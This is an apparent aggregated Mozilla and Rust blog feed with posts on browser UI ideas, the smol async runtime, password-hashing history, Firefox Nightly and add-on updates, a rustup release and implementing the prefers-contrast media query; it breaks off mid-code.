Innovation in browsers don't have to be only about supported technologies, but also about features of the browser itself. I have the feeling that we have dropped the ball on many things, as we race to be transparent with regards to websites and applications. Allowing technologies giving tools to web developers to create cool things is certainly very useful, but making a browser more useful for the immediate users is as much important. I don't want the browser to disappear in this mediating UI, I want it to give me more ways to manage and mitigate my interactions with the Web.

Slightly Related

Open tabs are cognitive spaces by Michail Rybakov.

It is time we stop treating websites as something solitary and alien to us. Web pages that we visit and leave open are artifacts of externalized cognition; keys to thinking and remembering.

The browser of today is a transitory space that brings us into a mental state, not just to a specific website destination. And we should design our browsers for this task.

Otsukare!

Responses/Comments from the Web

Karl DubostBrowser Wish List - Tab Splitting for Contextual Reading

On Desktop, I'm very often in a situation where I want to read a long article in a browser tab with a certain number of hypertext links. The number of actions I have to do to properly read the text is tedious. It's prone to errors, requires a bit of preparation and has a lot of manual actions.

The Why?

Take for example this article about The End of Tourism. There are multiple ways to read it.

  • We can read the text only.
  • We can click on each invidiual link when we reach it to open in the background tab, that we will check later.
  • We can click, read and come back to the main article.
  • We can open a new window and drag and drop the link to this new window.
  • We can ctrl+click in a new tab or a new window and then go to the context of this tab and window.

We can do better.

Having the possibility to read contextual information is useful for having a better understanding of the current article we are reading. Making this process accessible with only one click without losing the initial context would be tremendous.

What I Want: Tab Splitting For Contextual Reading

The "open a new window + link drag and drop" model of interactions is the closest of what I would like as a feature for reading things with hypertext links, but it's not practical.

  1. I want to be able to switch my current tab in a split tab either horizontally or vertically.
  2. Once the tab is in split mode. The first part is the current article, I'm reading. The second part is blank.
  3. Each time I'm clicking on a link in the first part (current article), it loads the content of the link in the second part.
  4. If I find that I want to keep the second part, I would be able to extract it in a new tab or new window.

This provides benefits for reading long forms with a lot of hypertext links. But you can imagine also how practical it could become for code browsing sites. It would create a very easy way to access another part of the code for contextual information or documentation.

There's nothing new required in terms of technologies to implement this. This is just browser UI manipulation and in which context to display a link.

Otsukare!

Niko MatsakisAsync Interview #8: Stjepan Glavina

Several months ago, on May 1st, I spoke to Stjepan Glavina about his (at the time) new crate, smol. Stjepan is, or ought to be, a pretty well-known figure in the Rust universe. He is one of the primary authors of the various crossbeam crates, which provide core parallel building blocks that are both efficient and very ergonomic to use. He was one of the initial designers for the async-std runtime. And so when I read stjepang’s blog post describing a new async runtime smol that he was toying with, I knew I wanted to learn more about it. After all, what could make stjepang say:

It feels like this is finally it - it’s the big leap I was longing for the whole time! As a writer of async runtimes, I’m excited because this runtime may finally make my job obsolete and allow me to move onto whatever comes next.

If you’d like to find out, then read on!

Video

You can watch the video on YouTube. I’ve also embedded a copy here for your convenience:

What is smol?

smol is an async runtime, similar to tokio or async-std, but with a distinctly different philosophy. It aims to be much simpler and smaller. Whereas async-std offers a kind of “mirror” of the libstd API surface, but made asynchronous, smol tries to get asynchrony by wrapping and adapting synchronous components. There are two main ways to do this:

  • One option is to delegate to a thread-pool. As we’ll see, stjepang argues that this option is can be much more efficient than people realize, and that it makes sense for things like accesses to the local file system. smol offers the blocking! macro as well as adapters like the reader function, which converts impl Read values into impl AsyncRead values.
  • The other option is to use the Async<T> wrapper to convert blocking I/O sockets into non-blocking ones. This works for any I/O type T that is compatible with epoll (or its equivalent; on Mac, smol uses kqueue, and on Windows, smol uses wepoll).

Delegation to a thread pool

One of the debates that has been going back and forth when it comes to asynchronous coding is how to accommodate things that need to block. Async I/O is traditionally based on a “cooperative” paradigm, which means that if you thread is going to do blocking I/O – or perhaps even just execute a really long loop – you ought to use an explicit operation like spawn_blocking that tells the scheduler what’s going on.

Earlier, in the context of async-std, stjepang introduced a new async-std scheduler, inspired by Go. This scheduler would automatically determine when tasks were taking too long and try to spin up more threads to compensate. This was simpler to use, but it also had some downsides: it could be too pessimistic at times, creating spikes in the number of threads.

Therefore, in smol, stjepang returned to the approach of explicitly labeling your blocking sections, this time via the blocking! macro. This macro will move the “blocking code” out from the cooperative thread pool to one where the O/S manages the scheduling.

Explicit blocking is often just fine

In fact, you might say that the core argument of smol is that some mechanism like blocking! is often “good enough”. Rather than reproducing or cloning the libstd API surface to make it asynchronous, it is often just fine to use the existing API but with a blocking! adapter wrapped around it.

In particular, when interacting with the file system or with stdin/stdout, smol’s approach is based on blocking. It offers reader and writer adapters that move that processing to another thread.

The Async wrapper

But of course if you were spawning threads for all of your I/O, this would defeat the purpose of using an async runtime in the first place. Therefore, smol offers another approach, the Async<T> wrapper.

The idea of Async<T> is that you can take a blocking abstraction, like the TcpStream found in the standard library, and convert it to be asynchronous by creating a Async<TcpStream>. This works for any type that supports the AsRawFd trait, which gives access to the underlying file descriptor. We’ll explain that in a bit.

So what can you do with an Async<TcpStream>? The core operations that Async<T> offers are the async functions read_with and write_with. They allow you to wrap blocking operations and have them run asynchronously. For example, given a socket of type Async<UdpSocket>, you might write the following to send data asynchronously:

let len = socket.write_with(|s| s.send(msg)).await?;

How the wrappers work: epoll

So how do these wrappers work under the hood? The idea is quite simple, and it’s connected to how epoll works. The idea with a traditional Unix non-blocking socket is that it offers the same interface as a blocking one: i.e., you still invoke functions like send. However, if the kernel would have had to block, and the socket is in non-blocking mode, then it simply returns an error code instead. Now the user’s code knows that the operation wasn’t completed and it can try again later (in Rust, this is io::ErrorKind::WouldBlock). But how does it know when to try again? The answer is that it can invoke epoll to find out when the socket is ready to accept data.

The read_with and write_with methods build on this idea. Basically, they execute your underlying operation just like normal. But if that operation returns WouldBlock, then the function will register the underlying file descriptor (which was obtained via AsRawFd) with smol’s runtime and yield the current task. smol’s reactor will invoke epoll and when epoll indicates that the file descriptor is ready, it will start up your task, which will run your closure again. Hopefully this time it succeeds.

If this seems familiar, it should. Async<T> is basically the same as the core Future interface, but “specialized” to the case of pollable file descriptors that return WouldBlock instead of Poll::Pending. And of course the core Future interface was very much built with interfaces like epoll in mind.

Ergonomic wrappers

The read_with and write_with wrappers are very general but not the most convenient to use. Therefore, smol offers some “convenience impls” that basically wrap existing methods for you. So, for example, given my socket: Async<UdpStream>, earlier we saw that I can send data with write_with:

let len = socket.write_with(|s| s.send(msg)).await?;

but I can also invoke socket.send directly:

let len = socket.send(msg).await;

Under the hood, this just delegates to a call to write_with.

Bridging the sync vs sync worlds

stjepang argues that based the runtime around this idea of “bridging” the sync vs async worlds not only makes for a smaller runtime, but also has the potential to help bridge the gap between the “sync” and “async” worlds. Basically, user’s today have to choose: do they base their work around the synchronous I/O interfaces, like Read and Write, or the asynchronous ones? The former are more mature and there are a lot of libraries available that build on them, but the latter seem to be the future.

smol presents another option. Rather than converting all libraries to async, you can just adapt the synchronous libraries into the async world, either through Async<T>, where that applies, or through the blocking adapters like reader or writer.

We walked through the example of the inotify crate. This is an existing library that wraps the inotify interface in the linux kernel in idiomatic Rust. It is written in a sychronous style, however, and so you might think that if you are writing async code, you can’t use it. However, its core type implements AsRawFd. That means that you can create an Async<Inotify> instance and invoke all its methods by using the read_with or write_with methods (or create ergonomic wrappers of your own).

Digging into the runtime

In the video, we spent a fair amount of time digging into the guts of how smol is implemented. For example, smol never starts threads on its own: instead, users start their own threads and invoke functions from smol that put those threads to work. We also looked at the details of its thread scheduler, and compaerd it to some of the recent work towards a new Rayon scheduler that is still pending. (Side note, there’s a recorded deep dive on YouTube that digs into how the Rayon scheduler works, if that’s your bag). In any case, we kind of got into the weeds here, so I’ll spare you the details. You can watch the video. =)

The importance of auditing and customizing

One interesting theme that we came to later is the importance of being able to audit unsafe code. stjepang mentioned that he has often heard people say that they would be happy to have a runtime that doesn’t achieve peak performance, if it makes use of less unsafe code.

In fact, I think one of the things that stjepang would really like to see is people taking smol and, rather than using it directly, adapting it to their own codebases. Basically using it as a starting point to build your own runtime for your own needs.

Towards a generic runtime interface?

It’s not a short-term thing, but one of the things that I personally am very interested in is getting a better handle on what a “generic runtime interface” looks like. I’d love to see a future where async runtimes are like allocators: there is a default one that works “pretty well” that you can use a lot of the time, but it’s also really use to change that default and port your application over to more specialized allocators that work better for you.

I’ve often imagined this as a kind of trait that encapsulates the “core functions” a runtime would provide, kind of like the GlobalAlloc trait for allocators. But stjepang pointed out that smol suggests a different possibility, one where the std library offers a kind of “mini reactor”. This reactor would offer functions to “register” sockets, associate them with wakers, and a function that periodically identifies things that can make progress and pushes them along. This wouldn’t in and of itself be a runtime, but it would be a building block that other runtimes can use.

Anyway, as I said above, I don’t think we’re at the point where we know what a generic runtime interface should look like. I’m particularly a bit nervous about something that is overly tied to epoll, given all the interesting work going on around adapting io-uring (e.g., withoutboat’s Ringbahn) and so forth. But I think it’s an interesting thing to think about, and I definitely think smol stakes out an interesting point in this space.

Conclusion

My main takeaways from this conversation were:

  • The “core code” you need for a runtime is really very little.
  • Adapters like Async<T> and offloading work onto thread pools can be a helpful and practical way to unify the question of sync vs async.
  • In particular, while I knew that Future’s were conceptually quite close to epoll, I hadn’t realized how far you could get with a generic adapter like Async<T>, which maps between the I/O WouldBlock error and the Poll::Pending future result.
  • In thinking about the space of possible runtimes, we should be considering not only things like efficiency and ergonomics, but also the total amount of code and our ability to audit and understand it.

Comments?

There is a thread on the Rust users forum for this series.

Mozilla Open Policy & Advocacy BlogCriminal proceedings against Malaysiakini will harm free expression in Malaysia

The Malaysian government’s decision to initiate criminal contempt proceedings against Malaysiakini for third party comments on the news portal’s website is deeply concerning. The move sets a dangerous precedent against intermediary liability and freedom of expression. It ignores the internationally accepted norm that holding publishers responsible for third party comments has a chilling effect on democratic discourse. The legal outcome the Malaysian government is seeking would upend the careful balance which places liability on the bad actors who engage in illegal activities, and only holds companies accountable when they know of such acts.

Intermediary liability safe harbour protections have been fundamental to the growth of the internet. They have enabled hosting and media platforms to innovate and flourish without the fear that they would be crushed by a failure to police every action of their users. Imposing the risk of criminal liability for such content would place a tremendous, and in many cases fatal, burden on many online intermediaries while negatively impacting international confidence in Malaysia as a digital destination.

We urge the Malyasian government to drop the proceedings and hope the Federal Court of Malaysia will meaningfully uphold the right to freedom of expression guaranteed by Malaysia’s Federal Constitution.

 

The post Criminal proceedings against Malaysiakini will harm free expression in Malaysia appeared first on Open Policy & Advocacy.

The Mozilla BlogA look at password security, Part I: history and background

Today I’d like to talk about passwords. Yes, I know, passwords are the worst, but why? This is the first of a series of posts about passwords, with this one focusing on the origins of our current password systems starting with log in for multi-user systems.

The conventional story for what’s wrong with passwords goes something like this: Passwords are simultaneously too long for users to memorize and too short to be secure.

It’s easy to see how to get to this conclusion. If we restrict ourselves to just letters and numbers, then there are about 26 one character passwords, 212 two character passwords, etc. The fastest password cracking systems can check about 236 passwords/second, so if you want a password which takes a year to crack, you need a password of 10 characters long or longer.

The situation is actually far worse than this; most people don’t use randomly generated passwords because they are hard to generate and hard to remember. Instead they tend to use words, sometimes adding a number, punctuation, or capitalization here and there. The result is passwords that are easy to crack, hence the need for password managers and the like.

This analysis isn’t wrong, precisely; but if you’ve ever watched a movie where someone tries to break into a computer by typing passwords over and over, you’re probably thinking “nobody is a fast enough typist to try billions of passwords a second”. This is obviously true, so where does password cracking come into it?

How to design a password system

The design of password systems dates back to the UNIX operating system, designed back in the 1970s. This is before personal computers and so most computers were shared, with multiple people having accounts and the operating system being responsible for protecting one user’s data from another. Passwords were used to prevent someone else from logging into your account.

The obvious way to implement a password system is just to store all the passwords on the disk and then when someone types in their password, you just compare what they typed in to what was stored. This has the obvious problem that if the password file is compromised, then every password in the system is also compromised. This means that any operating system vulnerability that allows a user to read the password file can be used to log in as other users. To make matters worse, multiuser systems like UNIX would usually have administrator accounts that had special privileges (the UNIX account is called “root”). Thus, if a user could compromise the password file they could gain root access (this is known as a “privilege escalation” attack).

The UNIX designers realized that a better approach is to use what’s now called password hashing: instead of storing the password itself you store what’s called a one-way function of the password. A one-way function is just a function H that’s easy to compute in one direction but not the other.1 This is conventionally done with what’s called a hash function, and so the technique is known as “password hashing” and the stored values as “password hashes”

In this case, what that means is you store the pair: (Username, H(Password)). [Technical note: I’m omitting salt which is used to mitigate offline pre-computation attacks against the password file.] When the user tries to log in, you take the password they enter P and compute H(P). If H(P) is the same as the stored password, then you know their password is right (with overwhelming probability) and you allow them to log in, otherwise you return an error. The cool thing about this design is that even if the password file is leaked, the attacker learns only the password hashes.2

Problems and countermeasures

This design is a huge improvement over just having a file with cleartext passwords and it might seem at this point like you didn’t need to stop people from reading the password file at all. In fact, on the original UNIX systems where this design was used, the /etc/passwd file was publicly readable. However, upon further reflection, it has the drawback that it’s cheap to verify a guess for a given password: just compute H(guess) and compare it to what’s been stored. This wouldn’t be much of an issue if people used strong passwords, but because people generally choose bad passwords, it is possible to write password cracking programs which would try out candidate passwords (typically starting with a list of common passwords and then trying variants) to see if any of these matched. Programs to do this task quickly emerged.

The key thing to realize is that the computation of H(guess) can be done offline. Once you have a copy of the password file, you can compare your pre-computed hashes of candidate passwords against the password file without interacting with the system at all. By contrast, in an online attack you have to interact with the system for each guess, which gives it an opportunity to rate limit you in various ways (for instance by taking a long time to return an answer or by locking out the account after some number of failures). In an offline attack, this kind of countermeasure is ineffective.

There are three obvious defenses to this kind of attack:

  • Make the password file unreadable: If the attacker can’t read the password, they can’t attack it. It took a while to do this on UNIX systems, because the password file also held a lot of other user-type information that you didn’t want kept secret, but eventually that got split out into another file in what’s called “shadow passwords” (the passwords themselves are stored in /etc/shadow. Of course, this is just the natural design for Web-type applications where people log into a server.
  • Make the password hash slower: The cost of cracking is linear in the cost of checking a single password, so if you make the password hash slower, then you make cracking slower. Of course, you also make logging in slower, but as long as you keep that time reasonably short (below a second or so) then users don’t notice. The tricky part here is that attackers can build specialized hardware that is much faster than the commodity hardware running on your machine, and designing hashes which are thought to be slow even on specialized hardware is a whole subfield of cryptography.
  • Get people to choose better passwords: In theory this sounds good, but in practice it’s resulted in enormous numbers of conflicting rules about password construction. When you create an account and are told you need to have a password between 8 and 12 characters with one lowercase letter, one capital letter, a number and one special character from this set — but not from this other set — what they’re hoping you will do is create a strong passwords. Experience suggests you are pretty likely to use Passw0rd!, so the situation here has not improved that much unless people use password managers which generate passwords for them.

The modern setting

At this point you’re probably wondering what this has to do with you: almost nobody uses multiuser timesharing systems any more (although a huge fraction of the devices people use are effectively UNIX: MacOS is a straight-up descendent of UNIX and Linux and Android are UNIX clones). The multiuser systems that people do use are mostly Web sites, which of course use usernames and passwords. In future posts I will cover password security for Web sites and personal devices.


  1. Strictly speaking we need the function not just to be one-way but also to be preimage resistant, meaning that given H(P) it’s hard to find any input p such that H(p) == H(P)
  2. For more information on this, see Morris and Thompson for quite readable history of the UNIX design. One very interesting feature is that at the time this system was designed generic hash functions didn’t exist, and so they instead used a variant of DES. The password was converted into a DES key and then used to encrypt a fixed value. This is actually a pretty good design and even included a feature designed to prevent attacks using custom DES hardware. However, it had the unfortunate property that passwords were limited to 8 characters, necessitating new algorithms that would accept a longer password. 

The post A look at password security, Part I: history and background appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 75

Highlights

  • We’ve added a new section to about:preferences to opt-in to experimental features!
    • Go to about:preferences, and look for “Experiments” on the left-hand side.
    • The Nightly Experiments pane in about:preferences showing several experiments that users can toggle.

      Feeling experimental? Check these options out!

  • Firefox Lockwise (about:logins) now supports Login Export to a .csv file
    • ”Export Logins…” menu item in the menu of about:logins

      Your data is yours – so take your passwords and do what you will with them.

  • There’s a new WebRTC global sharing indicator enabled on Nightly!
    • The new WebRTC global sharing indicator in Nightly. The indicator shows that the user is sharing their microphone, camera and a Nightly window.

      This indicator can be dragged anywhere on screen and minimized, and works on all desktop platforms.

    • Noticed any issues? File bugs against this metabug for us to triage.
  • We need more Nightly users to help us test Fission!
    • Original announcement requesting testers on dev-platform
    • The team will soon add Fission to the about:preferences Experiments section, but in the meantime, you can opt-in to trying it by going to about:config and setting fission.autostart to true, and restarting
  • The DevTools team has merged the Messages side panel into the Response side panel (bug) in the Network tool. So, WebSocket frames are now displayed in the Response panel
    • The Network tool showing some WebSocket frames appearing in the Response panel.

Friends of the Firefox team

Resolved bugs (excluding employees)

Fixed more than one bug

  • ariasuni
  • Farooq AR
  • Itiel
  • kenrick95
  • Kriyszig
  • Kyle Knaggs
  • manas
  • Mark Smith [:mcs]
  • petcuandrei
  • Richard Sherman :rich :richorrichard
  • Sebastian Zartner [:sebo]
  • Sonia
  • Stepan Stava [:stepan]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
WebExtension APIs
  • Fixed regressions:
    • Mak fixed a regression in the downloads API that would make valid downloads to fail (Bug 1637973, originally regressed by Bug 1598216)
    • Rob fixed a regression related to webRequest API listeners ability to modify CSP headers on the requests intercepted (Bug 1635781, regressed by Bug 1462989)
  • Contributions:
    • Starting from Firefox 79, a new browser.tabs.warmup API method is available to the WebExtensions (Bug 1402256). The WebExtensions will be able to use this method to improve user perceived performance on switching between tabs). Thanks to ariasuni for contributing this enhancement!
    • In Firefox 79, browser.tabs.duplicate API method does now ensure that duplicated tabs are created as active, as in Chrome (Bug 1376088). Thanks ariasuni
    • dpk contributed a patch to improve error messages when invalid patterns are used in browser.tabs.query (Bug 1637431)
    • Sonia Singla contributed a patch to not show the WebExtensions contextMenu related to bookmarks on entries without a bookmarkGuid (Bug 1638360)
    • Myeongjun Go contributed a patch to allow localhost’s http urls as search providers defined in a WebExtensions manifest
    • Harsh contributed a patch to allow extensions to observe and modify requests created using the browser.downloads.download API (Bug 1579911)
Addon Manager & about:addons
  • Removed built-in certificate requirement for addon updates and installs when signed extensions are required (Bug 1308251)
  • other issues and/or regressions fixed in AOM and about:addons:
    • error logged when non-extension add-ons or the browser are being updated (Bug 1643854, regressed by Bug 1618500)
    • addon install cancellation ignored when the addon has been already downloaded (Bug 1559683)
    • addon details page not loaded as expected when clicking the add-on title in the about:addons list view (Bug 1645286)
    • missing select dropdown in extensions options_ui page when embedded into a about:addons page (Bug 1647727)

Developer Tools

  • Remote Debugging Added forward, back, and refresh buttons to remote debugging experience (bug)
    • The remote debugging interface showing some back and forward toolbar buttons to the left of the URL input.
  • Console Panel – 4XX and 5XX requests are now displayed as error in the console, and don’t need the Request/XHR filter to be enabled (bug)
    • A 500 Internal Server Error and a 400 Bad Request error appearing by default in the console.
  • Accessibility – Several improvements for a11y contributed by MarcoZ. More parts of the DevTools UI is now accessible to screen readers (bug, bug, bug, bug)
  • Console Panel – Blocked requests have a distinct style in the console (bug)
    • A series of requests being logged in the DevTools console. One of them has a crossed-out icon and different colouring to indicate that it was a blocked request. On the right side, a “Tracking” label has been applied to indicate that the request was blocked due to it being for a tracking script.
  • Debugger Panel – Debugger shows also sources cleaned up by GC (bug)
  • Network Panel – slow requests are marked with a turtle icon. Slow = Waiting for the response from the server is > 500 ms (bug). Default value stored in devtools.netmonitor.audits.slow
    • A series of network requests in the Network panel. Some of them have icons of turtles after the resource name to indicate that the responses returned slowly.
  • Network Panel – support for Server Side Events (SSE) coming in 80. Visualization for text/event-stream content types (bug, test page). Hidden behind a pref: devtools.netmonitor.features.sse
    • A Server Side Event endpoint is showing incoming event data via the Response panel in the Network inspector. The data is a mixture of raw strings (“Hello world”) and JSON.

Fission

Password Manager

PDFs & Printing

Performance

Performance Tools

Remote Protocol (Chrome DevTools Protocol subset)

  • When navigating to web pages with iframes included, all relevant page navigation events are sent out for each and every frame now. To get this finished various other small fixes were necessary too. The formerly added preference remote.frames.enabled is no longer necessary because frame handling is enabled by default now.
  • For the next while, the team will be focused on making Marionette Fission compatible. In the meantime, we’ll be gathering feedback from Puppeteer users and anyone else experimenting with Remote Protocol before we resume our work in that area.

Search and Navigation

Search:

  • Some reliability fixes for modern configuration.
  • Post-modern cleanup is now underway and is currently reworking how the search engine cache and initialization routines are handled.
  • Region detection
    • We’re now experimenting with doing regular checks for your region and updating it if you’ve changed location for more than a couple of weeks (before Region used to be static all the time, unless we explicitly reset it) – Bug 1627555
    • Better support to customize params depending on the region – Bug 1634580
    • Experiment will run in Beta to check reliability

Address Bar:

  • Address bar expansion on focus now obeys prefers-reduced-motion – Bug 1629303
  • On Windows it’s now possible to close the results panel by clicking on the toolbox draggable space – Bug 1628948
  • Fixed a regression where search suggestions were not provided anymore when restricting to search (with “?” or an alias) – Bug 1648385
  • Search suggestions will now be shown for a broader range of search strings (But not when the typed string looks like a url) – Bug 1628079
  • Search history is enabled by default in Firefox 78 and obeys the same preference as normal search suggestions – Bug 1643475
  • Fixed a bug where certain domains (like “pserver”) may be transformed into others when typed and confirmed without a protocol – Bug 1646928
  • A new browser.urlbar.dnsResolveSingleWordsAfterSearch preference allows to disable post-facto DNS resolution of single word searches that may be valid intranet names – Bug 1642943
  • Restriction tokens at the end of the search string are considered only if they are preceded by a space (Searching for “c++” now works correctly) – Bug 1636961
  • Tail search suggestions are enabled in EARLY_BETA_OR_EARLIER; release enabling is pending a Firefox 78 experiment – Bug 1645059 (demo: search for “hobbit holes for sale in i”)

WebRTC UI

Mozilla Addons BlogAdditional JavaScript syntax support in add-on developer tools

When an add-on is submitted to Firefox for validation, the add-ons linter checks its code and displays relevant errors, warnings, or friendly messages for the developer to review. JavaScript is constantly evolving, and when the linter lags behind the language, developers may see syntax errors for code that is generally considered acceptable. These errors block developers from getting their add-on signed or listed on addons.mozilla.org.

Example of JavaScript syntax error

On July 2, the linter was updated from ESLint 5.16 to ESLint 7.3 for JavaScript validation. This upgrades linter support to most ECMAScript 2020 syntax, including features like optional chaining, BigInt, and dynamic imports. As a quick note, the linter is still slightly behind what Firefox allows. We will post again in this blog the next time we make an update.

Want to help us keep the linter up-to-date? We welcome code contributions and encourage developers to report bugs found in our validation process.

The post Additional JavaScript syntax support in add-on developer tools appeared first on Mozilla Add-ons Blog.

This Week In RustThis Week in Rust 346

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is suckit, a tool to recursively download a website.

Thanks to Martin Schmidt for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No issues were proposed for CfP.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

308 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-07-07. One unimportant regression on a rollup; six improvements, two on rollups.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust is like a futuristic laser gun with an almost AI-like foot detector that turns the safety on when it recognises your foot.

u/goofbe on reddit

Thanks to Synek317 for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Rust Programming Language BlogAnnouncing Rustup 1.22.1

The rustup working group is happy to announce the release of rustup version 1.22.1. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.22.1 may be as easy as closing your IDE and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, or if the 1.22.0 release of rustup caused you to experience the problem that 1.22.1 fixes, you can get rustup from the appropriate page on our website.

What's new in rustup 1.22.1

When updating dependency crates for 1.22.0, a change in behaviour of the url crate slipped in which caused env_proxy to cease to work with proxy data set in the environment. This is unfortunate since those of you who use rustup behind a proxy and have updated to 1.22.0 will now find that rustup may not work properly for you.

If you are affected by this, simply re-download the installer and run it. It will update your existing installation of Rust with no need to uninstall first.

Thanks

Thanks to Ivan Nejgebauer who spotted the issue, provided the fix, and made rustup 1.22.1 possible, and to Ben Chen who provided a fix for our website.

Mozilla Addons BlogNew Extensions in Firefox for Android Nightly (Previously Firefox Preview)

Firefox for Android Nightly (formerly known as Firefox Preview) is a sneak peek of the new Firefox for Android experience. The browser is being rebuilt based on GeckoView, an embeddable component for Android, and we are continuing to gradually roll out extension support.

Including the add-ons from our last announcement, there are currently nine Recommended Extensions available to users. The latest three additions are in Firefox for Android Nightly and will be available on Firefox for Android Beta soon:

Decentraleyes prevents your mobile device from making requests to content delivery networks (i.e. advertisers), and instead provides local copies of common libraries. In addition to the benefit of increased privacy, Decentraleyes also reduces bandwidth usage—a huge benefit in the mobile space.

Privacy Possum has a unique approach to dealing with trackers. Instead of playing along with the cat and mouse game of removing trackers, it falsifies the information trackers used to create a profile of you, in addition to other anti-tracking techniques.

Youtube High Definition gives you more control over how videos are displayed on Youtube. You have the opportunity to set your preferred visual quality option and have it shine on your high-DPI device, or use a lower quality to save bandwidth.If you have more questions on extensions in Firefox for Android Nightly, please check out our FAQ. We will be posting further updates about our future plans on this blog.

The post New Extensions in Firefox for Android Nightly (Previously Firefox Preview) appeared first on Mozilla Add-ons Blog.

Hacks.Mozilla.OrgAdding prefers-contrast to Firefox

In this article, we’ll walk through the design and implementation of the prefers-contrast media query in Firefox. We’ll start by defining high contrast mode, then we’ll cover the importance of prefers-contrast. Finally, we’ll walk through the media query implementation in Firefox. By the end, you’ll have a greater understanding of how media queries work in Firefox, and why the prefers-contrast query is important and exciting.

When we talk about the contrast of a page we’re assessing how the web author’s color choices impact readability. For visitors with low vision web pages with low or insufficient contrast can be hard to use. The lack of distinction between text and its background can cause them to “bleed” together.

The What of prefers-contrast

Though the WCAG (Web Content Accessibility Guidelines) set standards for contrast that authors should abide by, not all sites do. To keep the web accessible, many browsers and OSes offer high-contrast settings to change how web pages and content looks. When these settings are enabled we say that a website visitor has high contrast mode enabled.

High contrast mode increases the contrast of the screen so that users with low vision have an easier time getting around. Depending on what operating system is being used, high contrast mode can make a wide variety of changes. It can reduce the visual complexity of the screen, force high contrast colors between text and backgrounds, apply filters to the screen, and more. Doing this all automatically and in a way that works for every application and website is hard.

For example, how should high contrast mode handle images? Photos taken in high or low light may lack contrast, and their subjects may be hard to distinguish. What about text that is set on top of images? If the image isn’t a single color, some parts may have high contrast, but others may not. At the moment, Firefox deals with text on images by drawing a backplate on the text. All this is great, but it’s still not quite ideal. Ideally, webpages could detect when high contrast mode is enabled and then make themselves more accessible. To do that we need to know how different operating systems implement high contrast mode.

OS-level high-contrast settings

Most operating systems offer high-contrast settings. On macOS, users can indicate that they’d prefer high contrast in System Preferences → Accessibility → Display. To honor this preference, macOS applies a high contrast filter to the screen. However, it won’t do anything to inform applications that high contrast is enabled or adjust the layout of the screen. This makes it hard for apps running on macOS to adjust themselves for high-contrast mode users. Furthermore, it means that users are completely dependent on the operating system to make the right modifications.

Windows takes a very different approach. When high contrast mode is enabled, Windows exposes this information to applications. Rather than apply a filter to the screen, it forces applications to use certain high contrast (or user-defined) colors. Unlike macOS, Windows also tells applications when high-contrast settings are enabled. In this way, applications can adjust themselves to be more high-contrast friendly.

Similarly, Firefox lets users customize high contrast colors or apply different colors to web content. This option can be enabled via the colors option under “Language and Appearance” in Firefox’s “Preferences” settings on all operating systems. When we talk about colors set by the user instead of by the page or application, we describe them as forced.

Forced colors in Firefox

a screenshot of Firefox Forced Colors Menu on a dark background

As we can see, different operating systems handle high-contrast settings in different ways. This impacts how prefers-contrast works on these platforms. On Windows, because Firefox is told when a high-contrast theme is in use, prefers-contrast can detect both high contrast from Windows and forced colors from within Firefox. On macOS, because Firefox isn’t told when a high-contrast theme is in use, prefers-contrast can only detect when colors are being forced from within the browser.

Want to see what something with forced colors looks like? Here is the Google homepage on Firefox with the default Windows high-contrast theme enabled:

google homepage with windows high contrast mode enabled

Notice how Firefox overrides the background colors (forced) to black and overrides outlines to yellow.

Some things are left to be desired by this forced colors approach. On the Google homepage above, you’ll notice that the profile image no longer appears next to the sign-in button. Here’s the Amazon homepage, also in Firefox, with the same Windows high-contrast theme enabled:

screenshot of high-contrast Amazon homepage with dark background

The images under “Ride electric” and “Current customer favorites” have disappeared, and the text in the “Father’s Day deals” section has not increased in contrast.

The Why of prefers-contrast

We can’t fault Google and Amazon for the missing images and other issues in the appearance of these high-contrast homepages. Without the prefers-contrast media query, there is no standardized way to detect a visitor’s contrast preferences. Even if Google and Amazon wanted to change their webpages to make them more accessible for different contrast preferences, they couldn’t. They have no way of knowing when a user has high-contrast mode enabled, even though the browser can tell.

That’s why prefers-contrast is so important. The prefers-contrast media query allows website authors to determine a visitor’s contrast preferences and update the website accordingly. Using prefers-contrast, a website author can differentiate between low and high contrast and detect when colors are being forced like this:

@media (prefers-contrast: forced) {
    /* some awesome, accessible, high contrast css */
}

This is great because well-informed website designers are much better at making their webpages accessible than automatic high contrast settings.

The How of prefers-contrast

This section covers how something like prefers-contrast actually gets implemented in Firefox. It’s an interesting dive into the internals of a browser, but if you’re just interested in the what and why of perfers-contrast then you’re welcome to move on to the conclusion.

Parsing

We’ll start our media query implementation journey with parsing. Parsing handles turning CSS and HTML into an internal representation that the browser understands. Firefox uses a browser engine called Servo to handle this. Luckily for us, Servo makes things pretty straightforward. To hook up parsing for our media query, we’ll head over to media_features.rs in the Servo codebase and we’ll add an enum to represent our media query.

/// Possible values for prefers-contrast media query.
/// https://drafts.csswg.org/mediaqueries-5/#prefers-contrast
#[derive(Clone, Copy, Debug, FromPrimitive, PartialEq, Parse, ToCss)]
#[repr(u8)]
#[allow(missing_docs)]
enum PrefersContrast {
    High,
    Low,
    NoPreference,
